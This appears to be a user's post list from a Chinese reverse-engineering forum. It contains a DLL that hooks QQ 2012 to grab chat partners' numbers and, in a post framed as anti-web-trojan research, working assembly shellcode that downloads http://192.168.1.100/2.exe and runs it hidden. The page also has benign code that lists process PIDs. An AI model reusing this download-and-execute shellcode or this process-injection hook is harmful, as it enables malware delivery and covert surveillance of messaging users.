|
[求助]不知各位有何思路可以获取QQ2012聊天对象的号码
// QQSubclass.cpp : Defines the entry point for the DLL application. // #include "stdafx.h" #include"resource.h" #include "detours/detours.h" #include <TCHAR.H> #include <WINLDAP.H> typedef int (__cdecl *QQFunOpenContactChatSession)(unsigned long,struct ITXData *); typedef int (__cdecl *QQFunGetContactChatSessionMainHWnd)(unsigned long); typedef int (__cdecl *QQFunGetIMVersion)(unsigned long); typedef LRESULT (CALLBACK *SUBCLASSPROC)(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData); typedef int (__cdecl *O_SetWindowSubclass)(HWND hWnd, SUBCLASSPROC pfnSubclass, UINT_PTR uIdSubclass, DWORD_PTR dwRefData); QQFunOpenContactChatSession qqFunOpenContactChatSession; QQFunOpenContactChatSession RealOpenContactChatSession; QQFunGetContactChatSessionMainHWnd qqFunGetContactChatSessionMainHWnd; QQFunGetIMVersion qqFunGetIMVersion; O_SetWindowSubclass o_SetWindowSubclass; LPVOID GetFunProc(LPCTSTR,LPCSTR); WNDPROC fnOldWndProc; HANDLE hModule; int __stdcall sub_10009E1F(HWND hWnd, int a2, char *hData, int a4) { return 0; } int __cdecl sub_10008E0D(HWND hWnd, int a2) { int result; HWND v5; result = a2 - 32769; switch(a2) { case 32783: v5=CreateDialogParam((HINSTANCE)hModule, MAKEINTRESOURCE(IDD_DIALOG), hWnd, (DLGPROC)sub_10009E1F, 0); result = SetPropW(hWnd, L"LeftHwnd", v5); return result; } } BOOL __cdecl ShowMenu(HWND hWnd) { OutputDebugStringA("ShowMenu"); HMENU hPopupMenu = CreatePopupMenu(); InsertMenu(hPopupMenu,0,MF_BYPOSITION,1000,"First"); InsertMenu(hPopupMenu,1,MF_BYPOSITION,1001,"Second"); POINT pt; GetCursorPos(&pt); int iSelection = TrackPopupMenu(hPopupMenu, TPM_BOTTOMALIGN | TPM_RETURNCMD, pt.x,pt.y, 0,hWnd,NULL); sub_10008E0D(hWnd, iSelection); return DestroyMenu(hPopupMenu); } static LRESULT CALLBACK SubclassWndProc(HWND hQQUIN, UINT uMsg, WPARAM wParam, LPARAM lParam) { OutputDebugStringA("SubclassWndProc"); if (uMsg == WM_NCRBUTTONUP) { ShowMenu(hQQUIN); return TRUE; } return CallWindowProc(fnOldWndProc, hQQUIN, uMsg, wParam, lParam); return TRUE; } void __cdecl MyOpenContactChatSession(unsigned long QQUIN,struct ITXData * xxx) { OutputDebugStringA("MyOpenContactChatSession"); o_SetWindowSubclass = (O_SetWindowSubclass)GetFunProc(_T("comctl32.dll"),"SetWindowSubclass"); if(o_SetWindowSubclass==NULL) { OutputDebugStringA("o_SetWindowSubclass==NULL"); return ; } OutputDebugStringA("o_SetWindowSubclass"); qqFunGetContactChatSessionMainHWnd = (QQFunGetContactChatSessionMainHWnd)GetFunProc(_T("AppUtil.dll"),"?GetChatSessionMainHWnd@ChatSession@Util@@YAPAUHWND__@@KH@Z"); if(qqFunOpenContactChatSession==NULL) { OutputDebugStringA("qqFunOpenContactChatSession"); return ; } if(QQUIN>10000) { OutputDebugStringA("qqFunGetContactChatSessionMainHWnd ==NULL"); qqFunGetContactChatSessionMainHWnd = (QQFunGetContactChatSessionMainHWnd)GetFunProc(_T("AppUtil.dll"),"?GetChatSessionMainHWnd@ChatSession@Util@@YAPAUHWND__@@KH@Z"); if(!IsWindow((HWND)qqFunGetContactChatSessionMainHWnd)) { SetProp((HWND)qqFunGetContactChatSessionMainHWnd,"QQUIN",(HANDLE)QQUIN); fnOldWndProc = (WNDPROC)SetWindowLong((HWND)qqFunGetContactChatSessionMainHWnd(QQUIN),GWL_WNDPROC,(DWORD)SubclassWndProc); PostMessage((HWND)qqFunGetContactChatSessionMainHWnd(QQUIN), (WM_APP + 1), 0,0); fnOldWndProc= (WNDPROC)SetWindowLong((HWND)qqFunGetContactChatSessionMainHWnd(QQUIN),GWL_WNDPROC, (DWORD)SubclassWndProc); //o_SetWindowSubclass((HWND)qqFunGetContactChatSessionMainHWnd(QQUIN), (SUBCLASSPROC)SubclassWndProc, 0, 0); } typedef unsigned short (__cdecl * MYGETIMVERSION) (unsigned long); unsigned short IMVersion = ((MYGETIMVERSION)GetProcAddress(LoadLibrary("KernelUtil"), "?GetIMVersion@Contact@Util@@YAGK@Z"))(QQUIN); char tzTemp[MAX_PATH * 2]; unsigned short QQVersion = (IMVersion % 100 | ((unsigned __int8)(IMVersion / 100) << 8)); wsprintfA(tzTemp, "%d:%04X",QQUIN, QQVersion); OutputDebugStringA(tzTemp); } RealOpenContactChatSession(QQUIN,xxx); return ; } BOOL AttachQQFun(VOID) { OutputDebugStringA("AttachQQFun"); DetourRestoreAfterWith(); DetourTransactionBegin(); DetourUpdateThread(GetCurrentThread()); RealOpenContactChatSession=(QQFunOpenContactChatSession)DetourFindFunction(_T("AppUtil.dll"),"?OpenContactChatSession@ChatSession@Util@@YAXKPAUITXData@@@Z"); if(RealOpenContactChatSession==NULL) { OutputDebugStringA("RealOpenContactChatSession"); return FALSE; } OutputDebugStringA("DetourAttach"); DetourAttach(&(PVOID&)RealOpenContactChatSession,MyOpenContactChatSession); return DetourTransactionCommit()==NO_ERROR; } BOOL DetachQQFun(VOID) { OutputDebugStringA("DetachQQFun"); DetourTransactionBegin(); DetourUpdateThread(GetCurrentThread()); DetourDetach(&(PVOID&)qqFunOpenContactChatSession,MyOpenContactChatSession); return DetourTransactionCommit()==NO_ERROR; } LPVOID GetFunProc(LPCTSTR qqDllName,LPCSTR qqFunName) { HMODULE hMod = GetModuleHandle(qqDllName); if(hMod == NULL) { TCHAR qqPath[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH,qqPath)==0) return NULL; _tcscat(qqPath,qqDllName); hMod = LoadLibrary(qqPath); if(hMod==NULL) return NULL; } return (LPVOID)GetProcAddress(hMod,qqFunName); } BOOL InitQQHook() { qqFunOpenContactChatSession = (QQFunOpenContactChatSession)GetFunProc(_T("AppUtil.dll"),"?OpenContactChatSession@ChatSession@Util@@YAXKPAUITXData@@@Z"); if(qqFunOpenContactChatSession==NULL) return FALSE; qqFunGetIMVersion = (QQFunGetIMVersion)GetFunProc(_T("KernelUtil.dll"),"?GetIMVersion@Contact@Util@@YAGK@Z"); if(qqFunGetIMVersion==NULL) return FALSE; return TRUE; } BOOL APIENTRY DllMain( HANDLE hinstDLL, DWORD ul_reason_for_call, LPVOID lpReserved ) { hModule = hinstDLL; switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: OutputDebugStringA("InitQQHook"); if(InitQQHook()==FALSE) { OutputDebugStringA("InitQQHookerror"); MessageBox(NULL,_T("error"),_T("qqhook"),MB_OK); return FALSE; } AttachQQFun(); break; case DLL_PROCESS_DETACH: DetachQQFun(); break; } return TRUE; } |
|
[下载]hook sendto函数取得QQ对方IP地址的代码
逆向两个出名的显IP的QQ都是HOOK sendto函数的 |
|
[原创]关于防网马(拦URLDownloadToFile)
/* 在peb中找到kernel32的地址: 1、fs指向teb结构 2、在teb+0x30地方指向peb结构 3、在peb+0x0c地方指向PEB_LDR_DATA结构 4、在PEB_LDR_DATA+0x1c地方就是一些动态连接库的地址了,如第一个指向ntdll.dll 第二个就是我们需要的kernel32.dll的地址 */ extra_data_start: __asm { push ebp; sub esp, 0x160; mov ebp,esp; push ebp; mov eax, fs:0x30 ;fs:0x30指向PEB mov eax, [eax + 0x0c] ;获取PEB_LDR_DATA结构的指针 mov esi, [eax + 0x1c] ;获取LDR_MODULE链表表首结点的inInitializeOrderModuleList成员的指针 lodsd mov edi, [eax + 0x08] ;inInitializeOrderModuleList偏移8h便得到Kernel32.dll的模块基址 mov eax, [edi+3Ch] ;指向IMAGE_NT_HEADERS mov edx, [edi+eax+78h] ;指向导出表 add edx,edi mov ecx, [edx+18h] ;取导出表中导出函数名字的数目 mov ebx, [edx+20h] ;取导出表中名字表的地址 add ebx,edi search: dec ecx mov esi, [ebx+ecx*4] add esi,edi ;GetProcAddress mov eax,0x50746547 cmp [esi], eax;比较"PteG" jne search mov eax,0x41636f72 cmp [esi+4],eax; "Acor" jne search mov ebx,[edx+24h] ;取得导出表中序号表的地址 add ebx,edi mov cx,[ebx+ecx*2] ;取得进入函数地址表的序号 mov ebx,[edx+1Ch] ;取得函数地址表的地址 add ebx,edi mov eax,[ebx+ecx*4] ;取得GetProcAddress函数的地址 add eax,edi mov [ebp+40h], eax ;把GetProcAddress函数的地址保存到[ebp+40h] ;开始查找 LoadLibrary的地址,先构造"LoadLibrary\0" push 0x0 push dword ptr 0x41797261 push dword ptr 0x7262694c push dword ptr 0x64616f4c push esp push edi call [ebp+40h] ;GetProcAddress(Kernel32基址, "LoadLibraryA") mov [ebp+44h], eax;把LoadLibraryA的地址存在ebp+0x44中 push dword ptr 0x00636578 ;构造WinExec字符 push dword ptr 0x456E6957 push esp push edi call [ebp+40h] ;GetProcAddress(Kernel32基址,"WinExec") mov [ebp+4], eax ;[ebp+4]保存WinExec地址 ; push dword ptr 0x00006e6f ;on push dword ptr 0x6d6c7275 ;urlm push esp call [ebp+44h] ;LoadLibrary(urlmon) mov edi, eax push dword ptr 0x00004165 ;eA push dword ptr 0x6c69466f ;oFil push dword ptr 0x5464616f ;oadT push dword ptr 0x6c6e776f ;ownl push dword ptr 0x444c5255 ;URLD push esp push edi call [ebp+40h] ;GetProcAddress(urlmon基址,"URLDownloadToFileA") mov [ebp+8], eax; URLDownloadToFileA ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; push 0 push 0 call Func1 _emit 'c' _emit ':' _emit '\\' _emit '2' _emit '2' _emit '2' _emit '2' _emit '.' _emit 'e' _emit 'x' _emit 'e' _emit '\0' Func1: pop edi; push edi; call Func2 _emit 'h' _emit 't' _emit 't' _emit 'p' _emit ':' _emit '/' _emit '/' _emit '1' _emit '9' _emit '2' _emit '.' _emit '1' _emit '6' _emit '8' _emit '.' _emit '1' _emit '.' _emit '1' _emit '0' _emit '0' _emit '/' _emit '2' _emit '.' _emit 'e' _emit 'x' _emit 'e' _emit '\0'; Func2: pop edi; push edi; push 0 call [ebp+8] ; 调用 URLDownloadToFileA(null,"http://192.168.1.100/2.exe","C:\2222.exe",null,null) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; push 0 call EXEC; _emit 'c'; _emit ':'; _emit '\\'; _emit '2'; _emit '2'; _emit '2'; _emit '2'; _emit '.'; _emit 'e'; _emit 'x'; _emit 'e'; _emit '\0'; //运行程序的名字, EXEC: pop edi; push edi; call [ebp+4] ; 调用 WinExec("c:\2222.exe",SW_HIDE) add esp, 0x160; pop ebp; } extra_data_end: |
|
[求助]拜师学win ASM 写一个loader!!
看Iczelion的Win32汇编教程 Win32教程30-Win32调试API 第三部分 Win32教程29-Win32调试API 第二部分 Win32教程28-Win32调试API 第一部分 |
|
[原创]好听音乐网 -- 歌曲下载分析流程及程序的编写
分析得很好收获很多呵呵 |
|
[下载]《[专题四]Rootkit的学习与研究》文章整理下载
因为原来的专题还没出来 |
|
[下载]《[专题四]Rootkit的学习与研究》文章整理下载
没办法我在这里上传文件失败 |
|
[求助]驱动里怎么获取进程的PID?
#include "ntddk.h" #include <stdlib.h> #define SystemProcessesAndThreadsInformation 5 //---------函数声明------------- NTKERNELAPI NTSTATUS ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ); //------------------------------ //---------线程信息结构--------- typedef struct _SYSTEM_THREAD_INFORMATION { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; LONG State; LONG WaitReason; } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION; //------------------------------ //---------进程信息结构--------- typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved1[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; SYSTEM_THREAD_INFORMATION Threads[1]; } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION; //------------------------------ //----------------DriverUnload------------------------------ VOID Unload(PDRIVER_OBJECT DriverObject) { DbgPrint("\nUnload Driver!\n"); } //---------------------------------------------------------- //==================== DriverEntry ========================= NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING str) { NTSTATUS ntStatus; char ProcessName[256]; ULONG cbBuffer = 0x8000; PSYSTEM_PROCESS_INFORMATION pInfo; VOID* pBuffer = NULL; DbgPrint("\nDriverEntry!\n"); DriverObject->DriverUnload = Unload; pBuffer = ExAllocatePool (NonPagedPool, cbBuffer); if (pBuffer == NULL) { return 1; } // 获取进程信息 ntStatus = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, pBuffer, cbBuffer, NULL); // 指针指向链表头部 pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer; // 输出结果 while(1){ LPWSTR pszProcessName = pInfo->ProcessName.Buffer; if (pszProcessName == NULL) pszProcessName = L"NULL"; wcstombs(ProcessName,pszProcessName,256); DbgPrint("%s\tPid=%d\n",ProcessName,pInfo->ProcessId); if (pInfo->NextEntryDelta == 0) break; // 读取下一个节点 pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo)+ pInfo->NextEntryDelta); } // 释放缓冲区 ExFreePool(pBuffer); return STATUS_SUCCESS; } //========================================================== |
|
[求助]驱动里怎么获取进程的PID?
#include <windows.h> #include <ntsecapi.h> #include <stdio.h> #define SystemProcessesAndThreadsInformation 5 // 动态调用 typedef DWORD (WINAPI *ZWQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); // 结构定义 typedef struct _SYSTEM_PROCESS_INFORMATION{ DWORD NextEntryDelta; DWORD ThreadCount; DWORD Reserved1[6]; FILETIME ftCreateTime; FILETIME ftUserTime; FILETIME ftKernelTime; UNICODE_STRING ProcessName; DWORD BasePriority; DWORD ProcessId; DWORD InheritedFromProcessId; DWORD HandleCount; DWORD Reserved2[2]; DWORD VmCounters; DWORD dCommitCharge; PVOID ThreadInfos[1]; }SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; int main() { // 导出函数 HMODULE hNtDll = GetModuleHandle("ntdll.dll"); ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,"ZwQuerySystemInformation"); ULONG cbBuffer = 0x10000; LPVOID pBuffer = NULL; PSYSTEM_PROCESS_INFORMATION pInfo; pBuffer = malloc(cbBuffer); if(pBuffer == NULL) return -1; // 获取进程信息 ZwQuerySystemInformation(SystemProcessesAndThreadsInformation,pBuffer,cbBuffer,NULL); // 指针指向链表头部 pInfo= (PSYSTEM_PROCESS_INFORMATION)pBuffer; // 输出结果 for(;;) { printf("PID:%d \t%ls\n",pInfo->ProcessId,pInfo->ProcessName.Buffer); if(pInfo->NextEntryDelta == 0) break; // 读取下一个节点 pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo)+pInfo->NextEntryDelta); } // 释放缓冲区 free(pBuffer); return 0; } 在VC++6.0编译通过 驱动中原理应该一样 |
|
[分享]Overlay 最终版
恩好工具多谢啦 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值